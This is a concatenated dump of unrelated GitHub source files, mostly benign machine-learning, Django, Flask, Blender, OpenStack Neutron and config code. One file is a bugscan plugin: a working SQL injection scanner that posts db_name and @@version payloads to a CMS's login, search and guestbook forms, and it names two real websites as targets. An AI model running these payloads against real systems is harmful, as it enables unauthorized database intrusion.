expectation: An instance of ExpectationBase which defines a method for calculating
expectation values.
quantum_instance: A quantum instance used for calculations.
Returns:
A list of standard deviations.
"""
variances = np.real(expectation.compute_variance(observables_expect_sampled))
if not isinstance(variances, np.ndarray) and variances == 0.0:
# when `variances` is a single value equal to 0., our expectation value is exact and we
# manually ensure the variances to be a list of the correct length
variances = np.zeros(len(observables), dtype=float)
std_devs = np.sqrt(variances / quantum_instance.run_config.shots)
return std_devs
| [
"noreply@github.com"
] | manoelmarques.noreply@github.com |
5d268dd6a1d73ac3491ec9214064db7e76186d8e | f6db8d85a3b41eed543959314d65927353a8229c | /.history/W5/restaurant/forms_20201202155445.py | 54887e8fa52493f1ec9492f492ded07847b4da12 | [] | no_license | NFEL/DjangoPaeez99 | d573cc8e36500f08bc104d76f7a2628062d86c2f | 621636bfb47d71f2a4f45037b7264dd5ebc7cdd7 | refs/heads/main | 2023-01-27T22:05:57.788049 | 2020-12-08T10:08:28 | 2020-12-08T10:08:28 | 304,553,353 | 1 | 2 | null | 2020-10-16T07:33:04 | 2020-10-16T07:33:03 | null | UTF-8 | Python | false | false | 219 | py | from django import forms
# from django.db.models import fields
from .models import ElementAddress
class NearByReastaurants(forms.ModelForm):
class Meta:
model = ElementAddress
fields = ('element',) | [
"nfilsaraee@gmail.com"
] | nfilsaraee@gmail.com |
54fac0e0c625b35779f704ceba5b0921fa2f22a7 | 74faed0c7465e7fa629400ddfdcfd58f66a6d6e3 | /manage.py | 2b0a775b4b720d0487a55eea64bf1dabb56717ae | [] | no_license | dengshilong/test-flask | 5952dc28d39588705f71bc87cba6c50fcb959e92 | 847c51ea524e6ffde211ca41c82f21997cf02899 | refs/heads/master | 2021-01-19T20:08:01.744585 | 2017-04-17T09:17:22 | 2017-04-17T09:17:22 | 88,488,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | #!/usr/bin/env python
# pylint: disable=wrong-import-position
import os
from test_flask import create_app, db
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
from test_flask.models import User, Address
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
return dict(app=app, db=db, User=User, Address=Address)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
manager.run()
| [
"dengshilong1988@gmail.com"
] | dengshilong1988@gmail.com |
37dee3f1ada38b2abb4fe10458182260e4944d89 | a045c20593669cbb82395e58dc116154d5c6c86b | /stalker_hud_rig_helper/ui.py | 869ecbe3aee0c3af278fed8ba20c965e1b6658e9 | [] | no_license | PavelBlend/blender-stalker-hud-rig-helper-addon | 4eba43cf49c1b815048d54ad1205456e9ea3eb92 | 6ebeabbca92788cdb70f4cb286bf6f5b6e47b014 | refs/heads/master | 2020-06-04T20:23:39.285879 | 2019-06-16T09:38:18 | 2019-06-16T09:38:18 | 192,179,043 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,584 | py | import bpy
class _ListOp(bpy.types.Operator):
bl_idname = 'io_scene_xray.list'
bl_label = ''
operation = bpy.props.StringProperty()
collection = bpy.props.StringProperty()
index = bpy.props.StringProperty()
def execute(self, context):
data = getattr(context, _ListOp.bl_idname + '.data')
collection = getattr(data, self.collection)
index = getattr(data, self.index)
if self.operation == 'add':
collection.add().name = ''
elif self.operation == 'remove':
collection.remove(index)
if index > 0:
setattr(data, self.index, index - 1)
elif self.operation == 'move_up':
collection.move(index, index - 1)
setattr(data, self.index, index - 1)
elif self.operation == 'move_down':
collection.move(index, index + 1)
setattr(data, self.index, index + 1)
return {'FINISHED'}
def draw_list_ops(layout, dataptr, propname, active_propname):
def operator(operation, icon, enabled=None):
lay = layout
if (enabled is not None) and (not enabled):
lay = lay.split(align=True)
lay.enabled = False
operator = lay.operator(_ListOp.bl_idname, icon=icon)
operator.operation = operation
operator.collection = propname
operator.index = active_propname
layout.context_pointer_set(_ListOp.bl_idname + '.data', dataptr)
operator('add', 'ZOOMIN')
collection = getattr(dataptr, propname)
index = getattr(dataptr, active_propname)
operator('remove', 'ZOOMOUT', enabled=(index >= 0) and (index < len(collection)))
operator('move_up', 'TRIA_UP', enabled=(index > 0) and (index < len(collection)))
operator('move_down', 'TRIA_DOWN', enabled=(index >= 0) and (index < len(collection) - 1))
class BoneList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
obj = context.object
stk_data = obj.data.stalker_rig_helper
if stk_data.bone_collection_index == index:
icon = 'CHECKBOX_HLT'
else:
icon = 'CHECKBOX_DEHLT'
bone = stk_data.bone_collection[index]
row = layout.row()
row.label(text='', icon=icon)
row.prop_search(bone, 'hand_bone', obj.data, 'bones', text='')
wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
row.prop_search(bone, 'wpn_bone', wpn_obj.data, 'bones', text='')
row.prop_search(bone, 'offset_bone', obj.data, 'bones', text='')
class STALKER_HUD_Rig_Helper_Panel(bpy.types.Panel):
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "data"
bl_options = {'DEFAULT_CLOSED'}
bl_label = 'STALKER HUD Rig Helper'
@classmethod
def poll(cls, context):
if not context.object:
return False
return context.object.type == 'ARMATURE'
def draw(self, context):
obj = context.object
stk_data = obj.data.stalker_rig_helper
lay = self.layout
row = lay.row()
wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
if not wpn_obj:
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
return
if wpn_obj.type != 'ARMATURE':
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
return
if wpn_obj.name == obj.name:
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
return
row.prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
row = lay.row()
row.label('Hand Bones')
row.label(icon='FORWARD')
row.label('Weapon Bones')
row.label(icon='FORWARD')
row.label('Offset Bones')
row = lay.row()
col = row.column()
col.template_list(
'BoneList', 'name',
stk_data, 'bone_collection',
stk_data, 'bone_collection_index'
)
col = row.column(align=True)
draw_list_ops(
col, stk_data,
'bone_collection', 'bone_collection_index',
)
lay.operator('stalker_rig_helper.tie_weapon')
def register():
bpy.utils.register_class(_ListOp)
bpy.utils.register_class(BoneList)
bpy.utils.register_class(STALKER_HUD_Rig_Helper_Panel)
def unregister():
bpy.utils.unregister_class(STALKER_HUD_Rig_Helper_Panel)
bpy.utils.unregister_class(BoneList)
bpy.utils.unregister_class(_ListOp)
| [
"stalkermodkytia@yandex.ru"
] | stalkermodkytia@yandex.ru |
3bb521fa84719f1797e0bb0b6e9dc5230ea3ed5a | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/11c6ffa2-1596.py | 634f6b84e257b4ab196fc2c9b9eed72c5fc1cb73 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-070091
#refer:http://www.wooyun.org/bugs/wooyun-2010-077673
#refer:http://www.wooyun.org/bugs/wooyun-2010-082926
def assign(service, arg):
if service == "jienuohan":
return True, arg
def audit(arg):
payloads = [
'Web/Login.aspx',
'web/KeySearch.aspx?searchid=1',
'KeySearch.aspx',
'KeySearch.aspx',
'KeySearch.aspx',
'liuyan.aspx',
'liuyan.aspx',
'liuyan.aspx',
]
postdatas = [
'username=1%27%20and%20db_name%281%29%3E1--',
'operat=Search&state=&keyword=1%25%27%20and%20db_name%281%29%3E1--',
'title=1%27%20AND%20db_name%281%29%3E1--',
'author=1%27%20AND%20db_name%281%29%3E1--',
'keyword=1%27%20AND%20db_name%281%29%3E1--',
'LinkTel=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
'Mail=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
'username=1%27%2b%20%28select%20convert%28int%2C%28@@version%29%29%20FROM%20syscolumns%29%20%2b%27'
]
for i in range(8):
url = arg + payloads[i]
code, head, res, errcode, _ = curl.curl2(url,postdatas[i])
if 'master' in res :
security_hole(arg+payloads[i])
if __name__ == '__main__':
from dummy import *
audit(assign('jienuohan','http://www.cnemergency.com/')[1])
audit(assign('jienuohan','http://ctc.hlglzz.com/')[1])
| [
"yudekui@wsmtec.com"
] | yudekui@wsmtec.com |
bf5ff7b4246763917fcc89424e632f404a4f5308 | af41c215f420bbd66067d6dc851ce41d9ed40819 | /GBRBM/test_mini_movie.py | ad0397fa82fa6eb437eb6ead354ff9ac8e500f35 | [] | no_license | danathughes/pyNeuralNetwork | b704f525bddbc64eabf33c1174dad0649be7bfd9 | dbe2090e50434f33ac7a46845ad67eb5dc7dea87 | refs/heads/master | 2021-01-01T16:30:47.781646 | 2016-01-27T23:11:51 | 2016-01-27T23:11:51 | 19,729,930 | 0 | 4 | null | 2015-02-27T22:22:18 | 2014-05-13T07:32:24 | Python | UTF-8 | Python | false | false | 987 | py | from RBM import *
def get_RBM():
r = RBM(6,2)
k = 9
dataset = [[0.9,0.8,0.9,0.1,0.2,0.2],
[0.9,0.4,0.8,0.2,0.1,0.2],
[0.8,1.0,0.9,0.0,0.1,0.0],
[0.1,0.1,0.9,0.8,1.0,0.2],
[0.2,0.1,0.9,0.9,0.9,0.1],
[0.1,0.2,1.0,0.9,0.8,0.1]]
# Train at the following learning rates:
print "Training..."
learning_rates = [0.1, 0.05, 0.01, 0.005, 0.001, 0.0005, 0.0001]
# learning_rates = [0.1]
for rate in learning_rates:
print "Learning rate =", rate
for i in range(100):
print ' ' + str(i) + '...',
r.train_epoch(dataset, rate, k)
err = np.sum([r.free_energy(data) for data in dataset])
print 'Energy = ' + str(err) + '...',
PL = r.pseudolikelihood(dataset)
print 'Pseudolikelihood = ' + str(PL) + '...',
L = r.likelihood(dataset)
print 'Likelihood = ' + str(L) + '...',
print 'Done'
return r, dataset
| [
"danathughes@gmail.com"
] | danathughes@gmail.com |
276efaa89b7025eb62f18860f10c254de3df0147 | 26edf9a7a579782e72753c82082047ebe23a5080 | /catalyst/contrib/models/cv/segmentation/blocks/fpn.py | 2c3106814fe5f3f1db7a7f92fde028fe271e8148 | [
"Apache-2.0"
] | permissive | 418sec/catalyst | e8578c3561d54053bf53cb065d5ab516a2c505e9 | 8ce39fc31635eabc348b055a2df8ec8bc5700dce | refs/heads/master | 2023-02-17T22:18:57.257809 | 2021-01-21T09:27:46 | 2021-01-21T09:27:46 | 327,367,304 | 0 | 1 | Apache-2.0 | 2021-01-21T09:27:47 | 2021-01-06T16:24:31 | null | UTF-8 | Python | false | false | 3,708 | py | # flake8: noqa
# @TODO: code formatting issue for 20.07 release
import torch
from torch import nn
from torch.nn import functional as F
from catalyst.contrib.models.cv.segmentation.blocks.core import DecoderBlock
class DecoderFPNBlock(DecoderBlock):
"""@TODO: Docs (add description, `Example`). Contribution is welcome."""
def __init__(
self,
in_channels: int,
enc_channels: int,
out_channels: int,
in_strides: int = None,
upsample_scale: int = 2,
interpolation_mode: str = "nearest",
align_corners: bool = None,
aggregate_first: bool = False,
**kwargs
):
"""
Args:
@TODO: Docs. Contribution is welcome.
"""
self.upsample_scale = upsample_scale
self.interpolation_mode = interpolation_mode
self.align_corners = align_corners
super().__init__(
in_channels, enc_channels, out_channels, in_strides, **kwargs
)
def _get_block(self):
block = nn.Conv2d(self.enc_channels, self.out_channels, kernel_size=1)
return block
def forward(
self, bottom: torch.Tensor, left: torch.Tensor
) -> torch.Tensor:
"""Forward call."""
x = F.interpolate(
bottom,
scale_factor=self.upsample_scale,
mode=self.interpolation_mode,
align_corners=self.align_corners,
)
left = self.block(left)
x = x + left
return x
class Conv3x3GNReLU(nn.Module):
"""@TODO: Docs (add description, `Example`). Contribution is welcome."""
def __init__(
self,
in_channels,
out_channels,
upsample=False,
upsample_scale: int = 2,
interpolation_mode: str = "bilinear",
align_corners: bool = True,
):
"""
Args:
@TODO: Docs. Contribution is welcome.
"""
super().__init__()
self.upsample = upsample
self.upsample_scale = upsample_scale
self.interpolation_mode = interpolation_mode
self.align_corners = align_corners
self.block = nn.Sequential(
nn.Conv2d(
in_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False,
),
nn.GroupNorm(32, out_channels),
nn.ReLU(inplace=True),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Forward call."""
x = self.block(x)
if self.upsample:
x = F.interpolate(
x,
scale_factor=self.upsample_scale,
mode=self.interpolation_mode,
align_corners=self.align_corners,
)
return x
class SegmentationBlock(nn.Module):
"""@TODO: Docs (add description, `Example`). Contribution is welcome."""
def __init__(
self, in_channels: int, out_channels: int, num_upsamples: int = 0
):
"""@TODO: Docs. Contribution is welcome."""
super().__init__()
blocks = [
Conv3x3GNReLU(
in_channels, out_channels, upsample=bool(num_upsamples)
)
]
if num_upsamples > 1:
for _ in range(1, num_upsamples): # noqa: WPS122
blocks.append(
Conv3x3GNReLU(out_channels, out_channels, upsample=True)
)
self.block = nn.Sequential(*blocks)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Forward call."""
return self.block(x)
__all__ = ["DecoderFPNBlock", "Conv3x3GNReLU", "SegmentationBlock"]
| [
"noreply@github.com"
] | 418sec.noreply@github.com |
a5675c5781886c2efa317d61bb02a5aa1e60eabe | 3be8b5d0334de1f3521dd5dfd8a58704fb8347f9 | /dependencies/mongo/example/nested_reference.py | a69614dea4ae0d495a5995665ac30ce01e296563 | [
"MIT"
] | permissive | bmillham/djrq2 | 21a8cbc3087d7ad46087cd816892883cd276db7d | 5f357b3951600a9aecbe6c50727891b1485df210 | refs/heads/master | 2023-07-07T01:07:35.093669 | 2023-06-26T05:21:33 | 2023-06-26T05:21:33 | 72,969,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # encoding: utf-8
from marrow.mongo.document import Document
from marrow.mongo.field import ObjectId, String, Embed
class Sample(Document):
class Nested(Document):
name = String()
reference = ObjectId()
id = ObjectId('_id')
nested = Embed(Nested, default=lambda: Nested(), assign=True)
from pprint import pprint
pprint(Sample.id == None)
pprint(Sample.nested.name == "Alice")
| [
"bmillham@gmail.com"
] | bmillham@gmail.com |
41cc6093c3c0a68f6f0a994159f9a2551570180c | 5a281cb78335e06c631181720546f6876005d4e5 | /karbor-1.3.0/karbor/services/operationengine/engine/triggers/timetrigger/timeformats/crontab_time.py | e11467c8c185fbb93e1b6e2cce38bebbd4bd4c07 | [
"Apache-2.0"
] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 1,856 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from croniter import croniter
from datetime import datetime
from oslo_utils import timeutils
from karbor import exception
from karbor.i18n import _
from karbor.services.operationengine.engine.triggers.timetrigger import \
timeformats
class Crontab(timeformats.TimeFormat):
def __init__(self, start_time, pattern):
self._start_time = start_time
self._pattern = pattern
super(Crontab, self).__init__(start_time, pattern)
@classmethod
def check_time_format(cls, pattern):
if not pattern:
msg = (_("The trigger pattern is None"))
raise exception.InvalidInput(msg)
try:
croniter(pattern)
except Exception:
msg = (_("The trigger pattern(%s) is invalid") % pattern)
raise exception.InvalidInput(msg)
def compute_next_time(self, current_time):
time = current_time if current_time >= self._start_time else (
self._start_time)
return croniter(self._pattern, time).get_next(datetime)
def get_min_interval(self):
try:
t1 = self.compute_next_time(datetime.now())
t2 = self.compute_next_time(t1)
return timeutils.delta_seconds(t1, t2)
except Exception:
return None
| [
"Wayne Gong@minbgong-winvm.cisco.com"
] | Wayne Gong@minbgong-winvm.cisco.com |
f89a2a68338f83f4a881cb9afc97f86862752b31 | 0a08829b3327ecf180c72c03d0ba76d5ce118ae6 | /src/traffic_sign_classifier/model.py | da8623a2702b2c8fe677c5160aeab1dc25f0a117 | [] | no_license | ajunlonglive/self-driving-vehicle | 3ce2b83a642a7fc148288e12da9689592078a678 | a66746dea5448dcb175ab85a0a46ef60a09d185e | refs/heads/master | 2023-05-14T05:46:01.490492 | 2020-05-26T06:03:30 | 2020-05-26T06:03:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,388 | py | import numpy as np
import tensorflow as tf
from tensorflow.keras import layers
def dataset_pipeline(images, labels, input_fn, params, mode="train"):
num_classes = tf.constant(
np.repeat(params["num_classes"], len(images)).astype(np.int32), dtype=tf.int32
)
tf.assert_equal(tf.shape(images)[0], tf.shape(labels)[0], tf.shape(num_classes)[0])
shuffle_buffer_size = np.int32(images.shape[0])
with tf.name_scope("input_pipeline"):
data_pipeline = tf.data.Dataset.from_tensor_slices((images, labels, num_classes))
# We should map the data set first before making batches
data_pipeline = data_pipeline.map(input_fn, num_parallel_calls=2)
if mode == "train":
data_pipeline = data_pipeline.repeat(params["epochs"]) \
.shuffle(buffer_size=shuffle_buffer_size, reshuffle_each_iteration=True) \
.batch(params["batch_size"])
else:
data_pipeline = data_pipeline.batch(params["batch_size"])
return data_pipeline
class LeNet(tf.Module):
def __init__(self, num_classes):
self.conv1 = layers.Conv2D(filters=6, kernel_size=(5, 5), strides=1, activation="relu")
self.bn1 = layers.BatchNormalization()
self.pool1 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
self.conv2 = layers.Conv2D(filters=16, kernel_size=(5, 5), strides=1, activation="relu")
self.bn2 = layers.BatchNormalization()
self.pool2 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
self.flatten = layers.Flatten()
self.dense = layers.Dense(120, activation="relu")
self.dense2 = layers.Dense(84, activation="relu")
self.logits = layers.Dense(num_classes)
def __call__(self, features):
out = self.conv1(features)
# out = self.bn1(out)
# print('out.shape: ', out.shape)
out = self.pool1(out)
# print('out.shape: ', out.shape)
out = self.conv2(out)
# out = self.bn2(out)
# print('out.shape: ', out.shape)
out = self.pool2(out)
# print('out.shape: ', out.shape)
out = self.flatten(out)
# print('out.shape: ', out.shape)
out = self.dense(out)
# print('out.shape: ', out.shape)
out = self.logits(out)
# print("logits: ", out.shape)
return out
| [
"sardhendumishra@gmail.com"
] | sardhendumishra@gmail.com |
bed7c0f2544d7469900ac7b0c9d6a9378ac8d8be | b26772a7ac736f5454815567817feda20d690363 | /source/lists/migrations/0005_translationslist_language.py | 0dec92a3e658e3b07c63c711cf39fead34de7222 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | mverleg/WW | 3f49e4be411a6203951fccf6f967f8164b988d09 | b58a9bbfc91d19541840f490ed59997d85389c0a | refs/heads/master | 2021-01-10T06:53:22.004564 | 2015-09-23T21:28:13 | 2015-09-23T21:28:13 | 54,189,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('lists', '0004_more_help_text'),
]
operations = [
migrations.AddField(
model_name='translationslist',
name='language',
field=models.CharField(blank=True, max_length=8, null=True, help_text=b'You can select the language to learn for this list, or leave it blank for a mixed-language list.', choices=[(b'en-gb', 'English (British)'), (b'zh-cn', 'Chinese (simplified Mandarin)'), (b'de', 'German'), (b'nl', 'Dutch')]),
preserve_default=True,
),
]
| [
"mark@rafiki"
] | mark@rafiki |
4113f46b5b98d26a87750e2dfe93b09c474d84ff | 8fbd17c39db677b91442f6e26d7e760d8296c064 | /chapter_11/fmnist_momentum.py | 9e6f464027c6e5af29db09ee0772ea3f11d7c188 | [
"MIT"
] | permissive | a1ip/MathForDeepLearning | 869172a36292a77195d28ffee23281e25a0440e3 | 8db1a85ce3cef4b48aab01ebe156e3fab2dfa271 | refs/heads/main | 2023-09-02T13:17:54.098315 | 2021-10-24T13:40:26 | 2021-10-24T13:40:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | #
# file: fmnist_momentum.py
#
# Train and test the small 14x14 FMNIST dataset.
#
# RTK, 03-Feb-2021
# Last update: 19-Feb-2021
#
################################################################
from sklearn.metrics import matthews_corrcoef
import numpy as np
from NNm import *
# Load, reshape, and scale the data
x_train = np.load("../dataset/fmnist_train_images_small.npy")/255
x_test = np.load("../dataset/fmnist_test_images_small.npy")/255
y_train = np.load("../dataset/fmnist_train_labels_vector.npy")
y_test = np.load("../dataset/fmnist_test_labels.npy")
x_train = x_train.reshape(x_train.shape[0], 1, 14*14)
x_test = x_test.reshape(x_test.shape[0], 1, 14*14)
# Build the network using sigmoid activations
net = Network(verbose=True)
net.add(FullyConnectedLayer(14*14, 100, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(100, 50, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(50, 10, momentum=0.9))
net.add(ActivationLayer())
# Loss and train
net.fit(x_train, y_train, minibatches=40000, learning_rate=0.2)
# Build the confusion matrix using the test set predictions
out = net.predict(x_test)
pred = np.array(out)[:,0,:]
cm = np.zeros((10,10), dtype="uint32")
for i in range(len(y_test)):
cm[y_test[i],np.argmax(out[i])] += 1
# Show the results
print()
print(np.array2string(cm))
print()
print("accuracy = %0.7f" % (np.diag(cm).sum() / cm.sum(),))
print("MCC = %0.7f" % matthews_corrcoef(y_test, np.argmax(pred, axis=1)))
print()
| [
"oneelkruns@hotmail.com"
] | oneelkruns@hotmail.com |
00e20cd468336b04b4956713b6b9fd482529e2bb | dddbfd8eb6dff0bd3449bac87ee76b5c3e0bdfb1 | /icehouse-patches/neutron/vlan2vlan/neutron/common/config.py | 825672289770b3d46951b001355f5f0c0047d420 | [
"Apache-2.0"
] | permissive | joey5678/tricircle | 40897fed8fe9d6772e8878b4f06ba1a829636488 | e211f7efef129bbfb038cc05232ea1de33f82a97 | refs/heads/master | 2021-01-17T21:04:32.945469 | 2014-11-17T09:46:29 | 2014-11-17T10:10:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,309 | py | # Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Routines for configuring Neutron
"""
import os
from oslo.config import cfg
from oslo.db import options as db_options
from oslo import messaging
from paste import deploy
from neutron.api.v2 import attributes
from neutron.common import utils
from neutron.openstack.common import log as logging
from neutron import version
LOG = logging.getLogger(__name__)
core_opts = [
cfg.StrOpt('bind_host', default='0.0.0.0',
help=_("The host IP to bind to")),
cfg.IntOpt('bind_port', default=9696,
help=_("The port to bind to")),
cfg.StrOpt('api_paste_config', default="api-paste.ini",
help=_("The API paste config file to use")),
cfg.StrOpt('api_extensions_path', default="",
help=_("The path for API extensions")),
cfg.StrOpt('policy_file', default="policy.json",
help=_("The policy file to use")),
cfg.StrOpt('auth_strategy', default='keystone',
help=_("The type of authentication to use")),
cfg.StrOpt('core_plugin',
help=_("The core plugin Neutron will use")),
cfg.ListOpt('service_plugins', default=[],
help=_("The service plugins Neutron will use")),
cfg.StrOpt('base_mac', default="fa:16:3e:00:00:00",
help=_("The base MAC address Neutron will use for VIFs")),
cfg.IntOpt('mac_generation_retries', default=16,
help=_("How many times Neutron will retry MAC generation")),
cfg.BoolOpt('allow_bulk', default=True,
help=_("Allow the usage of the bulk API")),
cfg.BoolOpt('allow_pagination', default=False,
help=_("Allow the usage of the pagination")),
cfg.BoolOpt('allow_sorting', default=False,
help=_("Allow the usage of the sorting")),
cfg.StrOpt('pagination_max_limit', default="-1",
help=_("The maximum number of items returned in a single "
"response, value was 'infinite' or negative integer "
"means no limit")),
cfg.IntOpt('max_dns_nameservers', default=5,
help=_("Maximum number of DNS nameservers")),
cfg.IntOpt('max_subnet_host_routes', default=20,
help=_("Maximum number of host routes per subnet")),
cfg.IntOpt('max_fixed_ips_per_port', default=5,
help=_("Maximum number of fixed ips per port")),
cfg.IntOpt('dhcp_lease_duration', default=86400,
deprecated_name='dhcp_lease_time',
help=_("DHCP lease duration (in seconds). Use -1 to tell "
"dnsmasq to use infinite lease times.")),
cfg.BoolOpt('dhcp_agent_notification', default=True,
help=_("Allow sending resource operation"
" notification to DHCP agent")),
cfg.BoolOpt('allow_overlapping_ips', default=False,
help=_("Allow overlapping IP support in Neutron")),
cfg.StrOpt('host', default=utils.get_hostname(),
help=_("The hostname Neutron is running on")),
cfg.BoolOpt('force_gateway_on_subnet', default=False,
help=_("Ensure that configured gateway is on subnet")),
cfg.BoolOpt('notify_nova_on_port_status_changes', default=True,
help=_("Send notification to nova when port status changes")),
cfg.BoolOpt('notify_nova_on_port_data_changes', default=True,
help=_("Send notification to nova when port data (fixed_ips/"
"floatingip) changes so nova can update its cache.")),
cfg.StrOpt('nova_url',
default='http://127.0.0.1:8774/v2',
help=_('URL for connection to nova')),
cfg.StrOpt('nova_admin_username',
help=_('Username for connecting to nova in admin context')),
cfg.StrOpt('nova_admin_password',
help=_('Password for connection to nova in admin context'),
secret=True),
cfg.StrOpt('nova_admin_tenant_id',
help=_('The uuid of the admin nova tenant')),
cfg.StrOpt('nova_admin_auth_url',
default='http://localhost:5000/v2.0',
help=_('Authorization URL for connecting to nova in admin '
'context')),
cfg.StrOpt('nova_ca_certificates_file',
help=_('CA file for novaclient to verify server certificates')),
cfg.BoolOpt('nova_api_insecure', default=False,
help=_("If True, ignore any SSL validation issues")),
cfg.StrOpt('nova_region_name',
help=_('Name of nova region to use. Useful if keystone manages'
' more than one region.')),
cfg.IntOpt('send_events_interval', default=2,
help=_('Number of seconds between sending events to nova if '
'there are any events to send.')),
# add by j00209498
cfg.StrOpt('cascade_str', default='cascaded',
help=_('cascade_str identity cascading openstack or cascaded'
'openstack, value = cascaded or cascading.')),
]
core_cli_opts = [
cfg.StrOpt('state_path',
default='/var/lib/neutron',
help=_("Where to store Neutron state files. "
"This directory must be writable by the agent.")),
]
# Register the configuration options
cfg.CONF.register_opts(core_opts)
cfg.CONF.register_cli_opts(core_cli_opts)
# Ensure that the control exchange is set correctly
messaging.set_transport_defaults(control_exchange='neutron')
_SQL_CONNECTION_DEFAULT = 'sqlite://'
# Update the default QueuePool parameters. These can be tweaked by the
# configuration variables - max_pool_size, max_overflow and pool_timeout
db_options.set_defaults(cfg.CONF,
connection=_SQL_CONNECTION_DEFAULT,
sqlite_db='', max_pool_size=10,
max_overflow=20, pool_timeout=10)
def init(args, **kwargs):
cfg.CONF(args=args, project='neutron',
version='%%prog %s' % version.version_info.release_string(),
**kwargs)
# FIXME(ihrachys): if import is put in global, circular import
# failure occurs
from neutron.common import rpc as n_rpc
n_rpc.init(cfg.CONF)
# Validate that the base_mac is of the correct format
msg = attributes._validate_regex(cfg.CONF.base_mac,
attributes.MAC_PATTERN)
if msg:
msg = _("Base MAC: %s") % msg
raise Exception(msg)
def setup_logging(conf):
"""Sets up the logging options for a log with supplied name.
:param conf: a cfg.ConfOpts object
"""
product_name = "neutron"
logging.setup(product_name)
LOG.info(_("Logging enabled!"))
def load_paste_app(app_name):
"""Builds and returns a WSGI app from a paste config file.
:param app_name: Name of the application to load
:raises ConfigFilesNotFoundError when config file cannot be located
:raises RuntimeError when application cannot be loaded from config file
"""
config_path = cfg.CONF.find_file(cfg.CONF.api_paste_config)
if not config_path:
raise cfg.ConfigFilesNotFoundError(
config_files=[cfg.CONF.api_paste_config])
config_path = os.path.abspath(config_path)
LOG.info(_("Config paste file: %s"), config_path)
try:
app = deploy.loadapp("config:%s" % config_path, name=app_name)
except (LookupError, ImportError):
msg = (_("Unable to load %(app_name)s from "
"configuration file %(config_path)s.") %
{'app_name': app_name,
'config_path': config_path})
LOG.exception(msg)
raise RuntimeError(msg)
return app
| [
"joehuang@huawei.com"
] | joehuang@huawei.com |
cb9a8d46b6e83034c5f9c0d66e55bdebe20adcc4 | d191a04a3ded41175ea84ae88ebddb4f262b7fb1 | /Dynamic_program/47_dice_roll_simulation.py | 21a976620079f907ec469158fee53ad284a8bf02 | [] | no_license | YLyeliang/now_leet_code_practice | ae4aea945bae72ec08b11e57a8f8a3e81e704a54 | 204d770e095aec43800a9771fe88dd553463d2f7 | refs/heads/master | 2022-06-13T20:22:51.266813 | 2022-05-24T05:29:32 | 2022-05-24T05:29:32 | 205,753,056 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,641 | py | # A die simulator generates a random number from 1 to 6 for each roll. You introduced a constraint to the generator
# such that it cannot roll the number i more than rollMax[i] (1-indexed) consecutive times.
#
# Given an array of integers rollMax and an integer n, return the number of distinct sequences that can be obtained
# with exact n rolls.
#
